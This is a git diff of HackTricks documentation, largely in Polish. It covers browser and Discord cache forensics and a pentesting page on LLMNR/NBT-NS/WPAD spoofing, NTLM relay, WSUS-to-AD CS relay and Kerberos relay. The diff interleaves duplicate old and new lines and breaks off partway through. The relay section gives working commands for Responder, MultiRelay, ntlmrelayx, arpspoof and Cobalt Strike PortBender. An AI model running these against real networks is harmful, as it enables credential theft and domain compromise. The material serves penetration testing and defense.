Metadane pobierania są dostępne za pośrednictwem [ESEDatabaseView](https://www.nirsoft.net/utils/ese_database_view.html), a konkretne kontenery przechowują dane takie jak URL, typ pliku i lokalizacja pobierania. Fizyczne pliki można znaleźć w `%userprofile%\Appdata\Roaming\Microsoft\Windows\IEDownloadHistory`.
Metadane pobrań są dostępne przez [ESEDatabaseView](https://www.nirsoft.net/utils/ese_database_view.html), a konkretne kontenery zawierają dane takie jak URL, typ pliku i lokalizacja pobrania. Fizyczne pliki można znaleźć w `%userprofile%\Appdata\Roaming\Microsoft\Windows\IEDownloadHistory`.
### Historia przeglądania
### Browsing History
Aby przeglądać historię przeglądania, można użyć [BrowsingHistoryView](https://www.nirsoft.net/utils/browsing_history_view.html), wymagając lokalizacji wyodrębnionych plików historii i konfiguracji dla Internet Explorera. Metadane tutaj obejmują czasy modyfikacji i dostępu, wraz z liczbą dostępu. Pliki historii znajdują się w `%userprofile%\Appdata\Local\Microsoft\Windows\History`.
Aby przejrzeć historię przeglądania, można użyć [BrowsingHistoryView](https://www.nirsoft.net/utils/browsing_history_view.html), podając lokalizację wyodrębnionych plików historii i konfigurację dla Internet Explorera. Metadane zawierają czasy modyfikacji i dostępu oraz liczbę dostępów. Pliki historii znajdują się w `%userprofile%\Appdata\Local\Microsoft\Windows\History`.
### Wpisane adresy URL
### Typed URLs
Wpisane adresy URL i ich czasy użycia są przechowywane w rejestrze pod `NTUSER.DAT` w `Software\Microsoft\InternetExplorer\TypedURLs` i `Software\Microsoft\InternetExplorer\TypedURLsTime`, śledząc ostatnie 50 adresów URL wprowadzonych przez użytkownika i ich ostatnie czasy wprowadzenia.
Wpisane adresy URL i czasy ich użycia są przechowywane w rejestrze w `NTUSER.DAT` pod kluczami `Software\Microsoft\InternetExplorer\TypedURLs` oraz `Software\Microsoft\InternetExplorer\TypedURLsTime`, śledząc ostatnie 50 wprowadzonych przez użytkownika adresów URL oraz czasy ich ostatniego wprowadzenia.
## Microsoft Edge
Microsoft Edge przechowuje dane użytkowników w `%userprofile%\Appdata\Local\Packages`. Ścieżki dla różnych typów danych to:
Microsoft Edge przechowuje dane użytkownika w `%userprofile%\Appdata\Local\Packages`. Ścieżki do różnych typów danych to:
- **Ścieżka profilu**: `C:\Users\XX\AppData\Local\Packages\Microsoft.MicrosoftEdge_XXX\AC`
- **Historia, ciasteczka i pobrania**: `C:\Users\XX\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat`
- **Ustawienia, zakładki i lista czytania**: `C:\Users\XX\AppData\Local\Packages\Microsoft.MicrosoftEdge_XXX\AC\MicrosoftEdge\User\Default\DataStore\Data\nouser1\XXX\DBStore\spartan.edb`
- **Pamięć podręczna**: `C:\Users\XXX\AppData\Local\Packages\Microsoft.MicrosoftEdge_XXX\AC#!XXX\MicrosoftEdge\Cache`
- **Ostatnie aktywne sesje**: `C:\Users\XX\AppData\Local\Packages\Microsoft.MicrosoftEdge_XXX\AC\MicrosoftEdge\User\Default\Recovery\Active`
- **Profile Path**: `C:\Users\XX\AppData\Local\Packages\Microsoft.MicrosoftEdge_XXX\AC`
- **History, Cookies, and Downloads**: `C:\Users\XX\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat`
- **Settings, Bookmarks, and Reading List**: `C:\Users\XX\AppData\Local\Packages\Microsoft.MicrosoftEdge_XXX\AC\MicrosoftEdge\User\Default\DataStore\Data\nouser1\XXX\DBStore\spartan.edb`
- **Cache**: `C:\Users\XXX\AppData\Local\Packages\Microsoft.MicrosoftEdge_XXX\AC#!XXX\MicrosoftEdge\Cache`
- **Last Active Sessions**: `C:\Users\XX\AppData\Local\Packages\Microsoft.MicrosoftEdge_XXX\AC\MicrosoftEdge\User\Default\Recovery\Active`
## Safari
Dane Safari są przechowywane w `/Users/$User/Library/Safari`. Kluczowe pliki to:
- **History.db**: Zawiera tabele `history_visits` i `history_items` z adresami URL i znacznikami czasu wizyt. Użyj `sqlite3`, aby zapytać.
- **History.db**: Zawiera tabele `history_visits` i `history_items` z URL-ami i znacznikami czasu odwiedzin. Użyj `sqlite3` do zapytań.
- **Downloads.plist**: Informacje o pobranych plikach.
- **Bookmarks.plist**: Przechowuje zakładkowane adresy URL.
- **Bookmarks.plist**: Przechowuje zakładki URL.
- **TopSites.plist**: Najczęściej odwiedzane strony.
- **Extensions.plist**: Lista rozszerzeń przeglądarki Safari. Użyj `plutil` lub `pluginkit`, aby je pobrać.
- **UserNotificationPermissions.plist**: Domeny uprawnione do wysyłania powiadomień. Użyj `plutil`, aby je przeanalizować.
- **LastSession.plist**: Karty z ostatniej sesji. Użyj `plutil`, aby je przeanalizować.
- **Wbudowana ochrona przed phishingiem przeglądarki**: Sprawdź, używając `defaults read com.apple.Safari WarnAboutFraudulentWebsites`. Odpowiedź 1 wskazuje, że funkcja jest aktywna.
- **Extensions.plist**: Lista rozszerzeń Safari. Użyj `plutil` lub `pluginkit`, aby je pobrać.
- **UserNotificationPermissions.plist**: Domeny uprawnione do wysyłania powiadomień. Użyj `plutil` do parsowania.
- **LastSession.plist**: Karty z ostatniej sesji. Użyj `plutil` do parsowania.
- **Browsers built-in anti-phishing**: Sprawdź używając `defaults read com.apple.Safari WarnAboutFraudulentWebsites`. Odpowiedź 1 oznacza, że funkcja jest aktywna.
## Opera
Dane Opery znajdują się w `/Users/$USER/Library/Application Support/com.operasoftware.Opera` i dzielą format Chrome'a dla historii i pobrań.
Dane Opery znajdują się w `/Users/$USER/Library/Application Support/com.operasoftware.Opera` i korzystają z formatu Chrome dla historii i pobrań.
- **Wbudowana ochrona przed phishingiem przeglądarki**: Zweryfikuj, sprawdzając, czy `fraud_protection_enabled` w pliku Preferencje jest ustawione na `true` za pomocą `grep`.
- **Browsers built-in anti-phishing**: Zweryfikuj, czy `fraud_protection_enabled` w pliku Preferences jest ustawione na `true` za pomocą `grep`.
Te ścieżki i polecenia są kluczowe dla uzyskania dostępu i zrozumienia danych przeglądania przechowywanych przez różne przeglądarki internetowe.
Te ścieżki i polecenia są kluczowe do uzyskania dostępu i zrozumienia danych przeglądania przechowywanych przez różne przeglądarki internetowe.
## References
- [https://nasbench.medium.com/web-browsers-forensics-7e99940c579a](https://nasbench.medium.com/web-browsers-forensics-7e99940c579a)
- [https://www.sentinelone.com/labs/macos-incident-response-part-3-system-manipulation/](https://www.sentinelone.com/labs/macos-incident-response-part-3-system-manipulation/)
- [https://books.google.com/books?id=jfMqCgAAQBAJ\&pg=PA128\&lpg=PA128\&dq=%22This+file](https://books.google.com/books?id=jfMqCgAAQBAJ&pg=PA128&lpg=PA128&dq=%22This+file)
- **Książka: OS X Incident Response: Scripting and Analysis By Jaron Bradley str. 123**
- **Book: OS X Incident Response: Scripting and Analysis By Jaron Bradley pag 123**
{{#include ../../../banners/hacktricks-training.md}}

89
src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/discord-cache-forensics.md Normal file
View File

@ -0,0 +1,89 @@
# Discord Cache Forensics (Chromium Simple Cache)
{{#include ../../../banners/hacktricks-training.md}}
This page summarizes how to triage Discord Desktop cache artifacts to recover exfiltrated files, webhook endpoints, and activity timelines. Discord Desktop is an Electron/Chromium app and uses Chromium Simple Cache on disk.
## Gdzie szukać (Windows/macOS/Linux)
- Windows: %AppData%\discord\Cache\Cache_Data
- macOS: ~/Library/Application Support/discord/Cache/Cache_Data
- Linux: ~/.config/discord/Cache/Cache_Data
Kluczowe struktury na dysku w katalogu Cache_Data:
- index: baza indeksu Simple Cache
- data_#: binarne pliki bloków cache, mogące zawierać wiele obiektów w cache
- f_######: pojedyncze wpisy cache przechowywane jako oddzielne pliki (często większe treści)
Uwaga: Usuwanie wiadomości/kanałów/serwerów w Discord nie czyści tego lokalnego cache. Elementy w cache często pozostają, a znaczniki czasu plików odpowiadają aktywności użytkownika, co umożliwia rekonstrukcję osi czasu.
## Co można odzyskać
- Pliki wynikające z exfiltracji i miniatury pobrane z cdn.discordapp.com/media.discordapp.net
- Obrazy, GIFy, wideo (np. .jpg, .png, .gif, .webp, .mp4, .webm)
- URL-e webhooków (https://discord.com/api/webhooks/…)
- Wywołania API Discord (https://discord.com/api/vX/…)
- Przydatne do korelowania beaconingu/exfiltracji oraz hashowania mediów w celu dopasowań wywiadowczych
## Szybki triage (ręcznie)
- Przeszukaj cache pod kątem wyraźnych artefaktów:
- Endpointy webhooków:
- Windows: findstr /S /I /C:"https://discord.com/api/webhooks/" "%AppData%\discord\Cache\Cache_Data\*"
- Linux/macOS: strings -a Cache_Data/* | grep -i "https://discord.com/api/webhooks/"
- URL-e załączników/CDN:
- strings -a Cache_Data/* | grep -Ei "https://(cdn|media)\.discord(app)?\.com/attachments/"
- Wywołania API Discord:
- strings -a Cache_Data/* | grep -Ei "https://discord(app)?\.com/api/v[0-9]+/"
- Sortuj wpisy w cache według czasu modyfikacji, aby zbudować szybką oś czasu (mtime odzwierciedla moment zapisania obiektu w cache):
- Windows PowerShell: Get-ChildItem "$env:AppData\discord\Cache\Cache_Data" -File -Recurse | Sort-Object LastWriteTime | Select-Object LastWriteTime, FullName
## Parsowanie wpisów f_* (ciało HTTP + nagłówki)
Pliki zaczynające się od f_ zawierają nagłówki odpowiedzi HTTP, po których następuje ciało. Blok nagłówków zwykle kończy się sekwencją \r\n\r\n. Przydatne nagłówki odpowiedzi to:
- Content-Type: do wnioskowania typu mediów
- Content-Location or X-Original-URL: Oryginalny zdalny URL do podglądu/korelacji
- Content-Encoding: może być gzip/deflate/br (Brotli)
Media można wydobyć, rozdzielając nagłówki od ciała i opcjonalnie dekompresując na podstawie Content-Encoding. Sprawdzanie magicznych bajtów jest przydatne, gdy brakuje Content-Type.
## Zautomatyzowane DFIR: Discord Forensic Suite (CLI/GUI)
- Repo: https://github.com/jwdfir/discord_cache_parser
- Funkcja: Rekurencyjnie skanuje folder cache Discord, wyszukuje URL-e webhooków/API/załączników, parsuje ciała f_*, opcjonalnie wydobywa media (carving), i generuje raporty osi czasu w formacie HTML + CSV z hashami SHA256.
Przykładowe użycie CLI:
```bash
# Acquire cache (copy directory for offline parsing), then run:
python3 discord_forensic_suite_cli \
--cache "%AppData%\discord\Cache\Cache_Data" \
--outdir C:\IR\discord-cache \
--output discord_cache_report \
--format both \
--timeline \
--extra \
--carve \
--verbose
```
Kluczowe opcje:
- --cache: Ścieżka do Cache_Data
- --format html|csv|both
- --timeline: Wygeneruj uporządkowany CSV timeline (wg czasu modyfikacji)
- --extra: Skanuj także sąsiednie Code Cache i GPUCache
- --carve: Carve media z surowych bajtów w pobliżu trafień regex (obrazy/wideo)
- Output: raport HTML, raport CSV, CSV timeline oraz folder z mediami z carved/extracted plikami
## Wskazówki analityka
- Powiąż czas modyfikacji (mtime) plików f_* i data_* z oknami aktywności użytkownika/atakującego, aby odtworzyć oś czasu.
- Oblicz hash odzyskanych mediów (SHA-256) i porównaj z known-bad lub exfil datasets.
- Wyekstrahowane webhook URLs można testować pod kątem liveness lub rotować; rozważ dodanie ich do blocklists i retro-hunting proxies.
- Cache utrzymuje się po “wiping” po stronie serwera. Jeśli możliwe pozyskanie, zbierz cały katalog Cache oraz powiązane sibling caches (Code Cache, GPUCache).
## Źródła
- [Discord as a C2 and the cached evidence left behind](https://www.pentestpartners.com/security-blog/discord-as-a-c2-and-the-cached-evidence-left-behind/)
- [Discord Forensic Suite (CLI/GUI)](https://github.com/jwdfir/discord_cache_parser)
- [Discord Webhooks Execute Webhook](https://discord.com/developers/docs/resources/webhook#execute-webhook)
{{#include ../../../banners/hacktricks-training.md}}

261
src/generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md
View File

@ -1,77 +1,77 @@
# Spoofing LLMNR, NBT-NS, mDNS/DNS i WPAD oraz ataki relayowe
# Spoofing LLMNR, NBT-NS, mDNS/DNS and WPAD and Relay Attacks
{{#include ../../banners/hacktricks-training.md}}
## Protokoły sieciowe
## Protokóły sieciowe
### Protokoły lokalnego rozwiązywania nazw
### Lokalne protokoły rozwiązywania nazw hostów
- **LLMNR, NBT-NS i mDNS**:
- Microsoft i inne systemy operacyjne używają LLMNR i NBT-NS do lokalnego rozwiązywania nazw, gdy DNS zawiedzie. Podobnie, systemy Apple i Linux używają mDNS.
- Protokoły te są podatne na przechwytywanie i spoofing z powodu ich nieautoryzowanej, rozgłoszeniowej natury w UDP.
- [Responder](https://github.com/lgandx/Responder) może być używany do podszywania się pod usługi, wysyłając sfałszowane odpowiedzi do hostów zapytujących te protokoły.
- Dalsze informacje na temat podszywania się pod usługi przy użyciu Respondera można znaleźć [tutaj](spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md).
- **LLMNR, NBT-NS, i mDNS**:
- Microsoft i inne systemy operacyjne używają LLMNR i NBT-NS do lokalnego rozwiązywania nazw, gdy DNS zawiedzie. Podobnie systemy Apple i Linux używają mDNS.
- Te protokoły są podatne na przechwytywanie i spoofing ze względu na brak uwierzytelnienia oraz ich charakter broadcastowy przez UDP.
- [Responder](https://github.com/lgandx/Responder) może być użyty do podszywania się pod usługi poprzez wysyłanie sfałszowanych odpowiedzi do hostów wykonujących zapytania do tych protokołów.
- Więcej informacji o podszywaniu się pod usługi z użyciem Responder można znaleźć [tutaj](spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md).
### Protokół automatycznego odkrywania proxy w sieci (WPAD)
### Web Proxy Auto-Discovery Protocol (WPAD)
- WPAD pozwala przeglądarkom na automatyczne odkrywanie ustawień proxy.
- Odkrywanie jest ułatwione przez DHCP, DNS lub przejście do LLMNR i NBT-NS, jeśli DNS zawiedzie.
- Responder może automatyzować ataki WPAD, kierując klientów do złośliwych serwerów WPAD.
- WPAD pozwala przeglądarkom automatycznie wykrywać ustawienia proxy.
- Wykrywanie odbywa się przez DHCP, DNS lub fallback do LLMNR i NBT-NS, jeśli DNS zawiedzie.
- Responder może zautomatyzować ataki WPAD, kierując klientów do złośliwych serwerów WPAD.
### Responder do zatruwania protokołów
### Responder for Protocol Poisoning
- **Responder** to narzędzie używane do zatruwania zapytań LLMNR, NBT-NS i mDNS, selektywnie odpowiadając w zależności od typów zapytań, głównie celując w usługi SMB.
- Jest preinstalowane w Kali Linux, konfigurowalne w `/etc/responder/Responder.conf`.
- **Responder** to narzędzie używane do zatruwania zapytań LLMNR, NBT-NS i mDNS, selektywnie odpowiadające w zależności od typu zapytania, głównie celując w usługi SMB.
- Jest preinstalowany w Kali Linux i konfigurowalny w `/etc/responder/Responder.conf`.
- Responder wyświetla przechwycone hashe na ekranie i zapisuje je w katalogu `/usr/share/responder/logs`.
- Obsługuje zarówno IPv4, jak i IPv6.
- Wersja Windows Respondera jest dostępna [tutaj](https://github.com/lgandx/Responder-Windows).
- Wersja Responder dla Windows jest dostępna [tutaj](https://github.com/lgandx/Responder-Windows).
#### Uruchamianie Respondera
#### Running Responder
- Aby uruchomić Responder z domyślnymi ustawieniami: `responder -I <Interface>`
- Dla bardziej agresywnego skanowania (z potencjalnymi skutkami ubocznymi): `responder -I <Interface> -P -r -v`
- Techniki przechwytywania wyzwań/odpowiedzi NTLMv1 dla łatwiejszego łamania: `responder -I <Interface> --lm --disable-ess`
- Podszywanie się pod WPAD można aktywować za pomocą: `responder -I <Interface> --wpad`
- Żądania NetBIOS mogą być rozwiązywane do IP atakującego, a proxy uwierzytelniające można ustawić: `responder.py -I <interface> -Pv`
- Dla bardziej agresywnego sondowania (z możliwymi skutkami ubocznymi): `responder -I <Interface> -P -r -v`
- Techniki do przechwytywania wyzwań/odpowiedzi NTLMv1 dla łatwiejszego łamania: `responder -I <Interface> --lm --disable-ess`
- Podszywanie się pod WPAD można aktywować poprzez: `responder -I <Interface> --wpad`
- Żądania NetBIOS mogą być rozwiązywane na IP atakującego, i można ustawić proxy uwierzytelniające: `responder.py -I <interface> -Pv`
### Zatruwanie DHCP za pomocą Respondera
### DHCP Poisoning with Responder
- Podszywanie się pod odpowiedzi DHCP może na stałe zatruć informacje o trasowaniu ofiary, oferując bardziej dyskretną alternatywę dla zatruwania ARP.
- Wymaga to precyzyjnej wiedzy o konfiguracji sieci docelowej.
- Uruchamianie ataku: `./Responder.py -I eth0 -Pdv`
- Ta metoda może skutecznie przechwytywać hashe NTLMv1/2, ale wymaga ostrożnego postępowania, aby uniknąć zakłóceń w sieci.
- Fałszowanie odpowiedzi DHCP może trwale zatruć informacje routingu ofiary, oferując mniej inwazyjną alternatywę dla ARP poisoning.
- Wymaga precyzyjnej wiedzy o konfiguracji docelowej sieci.
- Uruchomienie ataku: `./Responder.py -I eth0 -Pdv`
- Ta metoda może efektywnie przechwytywać hashe NTLMv1/2, ale wymaga ostrożnego obchodzenia się z siecią, aby uniknąć zakłóceń.
### Przechwytywanie poświadczeń za pomocą Respondera
### Capturing Credentials with Responder
- Responder będzie podszywał się pod usługi przy użyciu wyżej wymienionych protokołów, przechwytując poświadczenia (zwykle NTLMv2 Challenge/Response), gdy użytkownik próbuje uwierzytelnić się w podszywających się usługach.
- Można próbować obniżyć wersję do NetNTLMv1 lub wyłączyć ESS dla łatwiejszego łamania poświadczeń.
- Responder będzie podszywał się pod usługi używając wyżej wymienionych protokołów, przechwytując poświadczenia (zwykle NTLMv2 Challenge/Response), gdy użytkownik spróbuje uwierzytelnić się przeciwko sfałszowanym usługom.
- Można podejmować próby obniżenia wersji do NetNTLMv1 lub wyłączenia ESS, aby ułatwić łamanie poświadczeń.
Ważne jest, aby zauważyć, że stosowanie tych technik powinno odbywać się legalnie i etycznie, zapewniając odpowiednie upoważnienie i unikając zakłóceń lub nieautoryzowanego dostępu.
Ważne jest, aby stosowanie tych technik odbywało się legalnie i etycznie, z odpowiednim upoważnieniem oraz bez powodowania zakłóceń lub nieautoryzowanego dostępu.
## Inveigh
Inveigh to narzędzie dla testerów penetracyjnych i zespołów red, zaprojektowane dla systemów Windows. Oferuje funkcjonalności podobne do Respondera, wykonując ataki spoofingowe i man-in-the-middle. Narzędzie ewoluowało z skryptu PowerShell do binarnego pliku C#, z [**Inveigh**](https://github.com/Kevin-Robertson/Inveigh) i [**InveighZero**](https://github.com/Kevin-Robertson/InveighZero) jako głównymi wersjami. Szczegółowe parametry i instrukcje można znaleźć w [**wiki**](https://github.com/Kevin-Robertson/Inveigh/wiki/Parameters).
Inveigh jest narzędziem dla penetration testerów i red teamerów, zaprojektowanym dla systemów Windows. Oferuje funkcjonalności podobne do Responder, wykonując spoofing i man-in-the-middle attacks. Narzędzie ewoluowało z skryptu PowerShell do binarki w C#, a główne wersje to [**Inveigh**](https://github.com/Kevin-Robertson/Inveigh) i [**InveighZero**](https://github.com/Kevin-Robertson/InveighZero). Szczegółowe parametry i instrukcje można znaleźć w [**wiki**](https://github.com/Kevin-Robertson/Inveigh/wiki/Parameters).
Inveigh można obsługiwać za pomocą PowerShell:
```bash
Invoke-Inveigh -NBNS Y -ConsoleOutput Y -FileOutput Y
```
Lub wykonany jako binarny plik C#:
Lub uruchomione jako plik binarny C#:
```bash
Inveigh.exe
```
### NTLM Relay Attack
Atak ten wykorzystuje sesje uwierzytelniania SMB do uzyskania dostępu do docelowej maszyny, przyznając powłokę systemową w przypadku sukcesu. Kluczowe wymagania wstępne obejmują:
Ten atak wykorzystuje sesje uwierzytelniania SMB do uzyskania dostępu do maszyny docelowej, przyznając powłokę systemową, jeśli się powiedzie. Kluczowe wymagania wstępne obejmują:
- Użytkownik uwierzytelniający musi mieć dostęp lokalnego administratora na hostie, na który jest przekazywane połączenie.
- Podpisywanie SMB powinno być wyłączone.
- Użytkownik uwierzytelniający się musi mieć dostęp Local Admin na hoście, na który przekazywane jest połączenie.
- SMB signing powinno być wyłączone.
#### 445 Port Forwarding and Tunneling
W scenariuszach, w których bezpośrednie wprowadzenie do sieci nie jest możliwe, ruch na porcie 445 musi być przekierowany i tunelowany. Narzędzia takie jak [**PortBender**](https://github.com/praetorian-inc/PortBender) pomagają w przekierowywaniu ruchu na porcie 445 do innego portu, co jest niezbędne, gdy dostęp lokalnego administratora jest dostępny do ładowania sterowników.
W sytuacjach, gdy bezpośrednie wprowadzenie do sieci nie jest możliwe, ruch na porcie 445 musi być przekierowany i tunelowany. Narzędzia takie jak [**PortBender**](https://github.com/praetorian-inc/PortBender) pomagają przekierować ruch z portu 445 na inny port, co jest istotne, gdy dostęp Local Admin pozwala na załadowanie sterownika.
PortBender setup and operation in Cobalt Strike:
Konfiguracja i użycie PortBender w Cobalt Strike:
```bash
Cobalt Strike -> Script Manager -> Load (Select PortBender.cna)
@ -87,17 +87,17 @@ beacon> jobkill 0
beacon> rportfwd stop 8445
beacon> socks stop
```
### Inne narzędzia do ataku NTLM Relay
### Inne narzędzia dla NTLM Relay Attack
- **Metasploit**: Skonfigurowany z proxy, szczegółami lokalnych i zdalnych hostów.
- **smbrelayx**: Skrypt w Pythonie do relaying sesji SMB i wykonywania poleceń lub wdrażania backdoorów.
- **MultiRelay**: Narzędzie z pakietu Responder do relaying konkretnych użytkowników lub wszystkich użytkowników, wykonywania poleceń lub zrzucania hashy.
- **Metasploit**: Skonfiguruj z proxy oraz szczegółami hosta lokalnego i zdalnego.
- **smbrelayx**: Skrypt w Pythonie do relaying sesji SMB oraz wykonywania poleceń lub wdrażania backdoors.
- **MultiRelay**: Narzędzie z pakietu Responder do relay konkretnych użytkowników lub wszystkich użytkowników, wykonywania poleceń lub dump hashes.
Każde narzędzie można skonfigurować do działania przez proxy SOCKS, jeśli to konieczne, co umożliwia ataki nawet przy pośrednim dostępie do sieci.
Każde narzędzie można skonfigurować do działania przez SOCKS proxy w razie potrzeby, co umożliwia ataki nawet przy pośrednim dostępie do sieci.
### Działanie MultiRelay
MultiRelay jest uruchamiane z katalogu _**/usr/share/responder/tools**_, celując w konkretne adresy IP lub użytkowników.
MultiRelay jest uruchamiany z katalogu _**/usr/share/responder/tools**_, celując w konkretne adresy IP lub użytkowników.
```bash
python MultiRelay.py -t <IP target> -u ALL # Relay all users
python MultiRelay.py -t <IP target> -u ALL -c whoami # Execute command
@ -105,78 +105,139 @@ python MultiRelay.py -t <IP target> -u ALL -d # Dump hashes
# Proxychains for routing traffic
```
Te narzędzia i techniki tworzą kompleksowy zestaw do przeprowadzania ataków NTLM Relay w różnych środowiskach sieciowych.
These tools and techniques form a comprehensive set for conducting NTLM Relay attacks in various network environments.
### Wymuszanie logowania NTLM
### Abusing WSUS HTTP (8530) for NTLM Relay to LDAP/SMB/AD CS (ESC8)
W systemie Windows **możesz być w stanie wymusić, aby niektóre uprzywilejowane konta uwierzytelniały się na dowolnych maszynach**. Przeczytaj następującą stronę, aby dowiedzieć się jak:
WSUS clients authenticate to their update server using NTLM over HTTP (8530) or HTTPS (8531). When HTTP is enabled, periodic client check-ins can be coerced or intercepted on the local segment and relayed with ntlmrelayx to LDAP/LDAPS/SMB or AD CS HTTP endpoints (ESC8) without cracking any hashes. This blends into normal update traffic and frequently yields machine-account authentications (HOST$).
What to look for
- GPO/registry configuration under HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate and ...\WindowsUpdate\AU:
- WUServer (e.g., http://wsus.domain.local:8530)
- WUStatusServer (reporting URL)
- UseWUServer (1 = WSUS; 0 = Microsoft Update)
- DetectionFrequencyEnabled and DetectionFrequency (hours)
- WSUS SOAP endpoints used by clients over HTTP:
- /ClientWebService/client.asmx (approvals)
- /ReportingWebService/reportingwebservice.asmx (status)
- Default ports: 8530/tcp HTTP, 8531/tcp HTTPS
Reconnaissance
- Unauthenticated
- Scan for listeners: nmap -sSVC -Pn --open -p 8530,8531 -iL <hosts>
- Sniff HTTP WSUS traffic via L2 MITM and log active clients/endpoints with wsusniff.py (HTTP only unless you can make clients trust your TLS cert).
- Authenticated
- Parse SYSVOL GPOs for WSUS keys with MANSPIDER + regpol (wsuspider.sh wrapper summarises WUServer/WUStatusServer/UseWUServer).
- Query endpoints at scale from hosts (NetExec) or locally:
nxc smb <ip> -u <user> -p <pass> -M reg-query -o PATH="HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate" KEY="WUServer"
reg query HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate
End-to-end HTTP relay steps
1) Position for MITM (same L2) so a client resolves the WSUS server to you (ARP/DNS poisoning, Bettercap, mitm6, etc.). Example with arpspoof:
arpspoof -i <iface> -t <wsus_client_ip> <wsus_server_ip>
2) Redirect port 8530 to your relay listener (optional, convenient):
iptables -t nat -A PREROUTING -p tcp --dport 8530 -j REDIRECT --to-ports 8530
iptables -t nat -L PREROUTING --line-numbers
3) Start ntlmrelayx with the HTTP listener (requires Impacket support for HTTP listener; see PRs below):
ntlmrelayx.py -t ldap://<DC> -smb2support -socks --keep-relaying --http-port 8530
Other common targets:
- Relay to SMB (if signing off) for exec/dump: -t smb://<host>
- Relay to LDAPS for directory changes (e.g., RBCD): -t ldaps://<DC>
- Relay to AD CS web enrollment (ESC8) to mint a cert and then authenticate via Schannel/PKINIT:
ntlmrelayx.py --http-port 8530 -t http://<CA>/certsrv/certfnsh.asp --adcs --no-http-server
For deeper AD CS abuse paths and tooling, see the AD CS page:
{{#ref}}
../../windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.md
{{#endref}}
4) Trigger a client check-in or wait for schedule. From a client:
wuauclt.exe /detectnow
or use the Windows Update UI (Check for updates).
5) Use the authenticated SOCKS sessions (if -socks) or direct relay results for post-exploitation (LDAP changes, SMB ops, or AD CS certificate issuance for later authentication).
HTTPS constraint (8531)
- Passive interception of WSUS over HTTPS is ineffective unless clients trust your certificate. Without a trusted cert or other TLS break, the NTLM handshake cant be harvested/relayed from WSUS HTTPS traffic.
Notes
- WSUS was announced deprecated but remains widely deployed; HTTP (8530) is still common in many environments.
- Useful helpers: wsusniff.py (observe HTTP WSUS check-ins), wsuspider.sh (enumerate WUServer/WUStatusServer from GPOs), NetExec reg-query at scale.
- Impacket restored HTTP listener support for ntlmrelayx in PR #2034 (originally added in PR #913).
### Force NTLM Logins
In Windows you **may be able to force some privileged accounts to authenticate to arbitrary machines**. Read the following page to learn how:
{{#ref}}
../../windows-hardening/active-directory-methodology/printers-spooler-service-abuse.md
{{#endref}}
## Atak Kerberos Relay
## Kerberos Relay attack
Atak **Kerberos relay** kradnie **bilet AP-REQ** z jednej usługi i ponownie go wykorzystuje przeciwko drugiej usłudze, która dzieli **ten sam klucz konta komputera** (ponieważ oba SPN-y znajdują się na tym samym koncie maszyny `$`). Działa to, mimo że **klasy usług SPN-ów różnią się** (np. `CIFS/``LDAP/`), ponieważ *klucz*, który odszyfrowuje bilet, to NT hash maszyny, a nie sam ciąg SPN, a ciąg SPN nie jest częścią podpisu.
A **Kerberos relay attack** steals an **AP-REQ ticket** from one service and re-uses it against a second service that shares the **same computer-account key** (because both SPNs sit on the same `$` machine account). This works even though the SPNs **service classes differ** (e.g. `CIFS/``LDAP/`) because the *key* that decrypts the ticket is the machines NT hash, not the SPN string itself and the SPN string is not part of the signature.
W przeciwieństwie do NTLM relay, skok jest ograniczony do *tej samej hosta*, ale jeśli celujesz w protokół, który pozwala na zapis do LDAP, możesz połączyć się z **Resource-Based Constrained Delegation (RBCD)** lub **AD CS enrollment** i uzyskać **NT AUTHORITY\SYSTEM** za jednym razem.
Unlike NTLM relay, the hop is limited to the *same host* but, if you target a protocol that lets you write to LDAP, you can chain into **Resource-Based Constrained Delegation (RBCD)** or **AD CS enrollment** and pop **NT AUTHORITY\SYSTEM** in a single shot.
Aby uzyskać szczegółowe informacje na temat tego ataku, sprawdź:
For detailed info about this attack check:
- [https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html](https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html)
- [https://decoder.cloud/2025/04/24/from-ntlm-relay-to-kerberos-relay-everything-you-need-to-know/](https://decoder.cloud/2025/04/24/from-ntlm-relay-to-kerberos-relay-everything-you-need-to-know/)
- 1. **Podstawy Kerberos**
- 1. **Kerberos basics**
| Token | Cel | Znaczenie dla relay |
| Token | Purpose | Relay relevance |
|-------|---------|-----------------|
| **TGT / AS-REQ ↔ REP** | Udowadnia użytkownika KDC | nietknięty |
| **Bilet usługi / TGS-REQ ↔ REP** | Powiązany z jednym **SPN**; zaszyfrowany kluczem właściciela SPN | wymienny, jeśli SPN-y dzielą konto |
| **AP-REQ** | Klient wysyła `TGS` do usługi | **co kradniemy i odtwarzamy** |
| **TGT / AS-REQ ↔ REP** | Proves the user to the KDC | untouched |
| **Service ticket / TGS-REQ ↔ REP** | Bound to one **SPN**; encrypted with the SPN owners key | interchangeable if SPNs share account |
| **AP-REQ** | Client sends `TGS` to the service | **what we steal & replay** |
* Bilety są szyfrowane **kluczem pochodzącym z hasła konta, które posiada SPN**.
* **Authenticator** wewnątrz AP-REQ ma znacznik czasu 5 minut; odtworzenie w tym oknie jest ważne, dopóki pamięć podręczna usługi nie zobaczy duplikatu.
* Windows rzadko sprawdza, czy ciąg SPN w bilecie pasuje do usługi, którą trafiasz, więc bilet dla `CIFS/HOST` zazwyczaj odszyfrowuje się poprawnie na `LDAP/HOST`.
* Tickets are encrypted with the **password-derived key of the account that owns the SPN**.
* The **Authenticator** inside the AP-REQ has a 5-minute timestamp; replay inside that window is valid until the service cache sees a duplicate.
* Windows rarely checks if the SPN string in the ticket matches the service you hit, so a ticket for `CIFS/HOST` normally decrypts fine on `LDAP/HOST`.
- 2. **Co musi być prawdą, aby przekazać Kerberos**
- 2. **What must be true to relay Kerberos**
1. **Wspólny klucz:** źródłowe i docelowe SPN-y należą do tego samego konta komputera (domyślnie na serwerach Windows).
2. **Brak ochrony kanału:** SMB/LDAP podpisy wyłączone i EPA wyłączone dla HTTP/LDAPS.
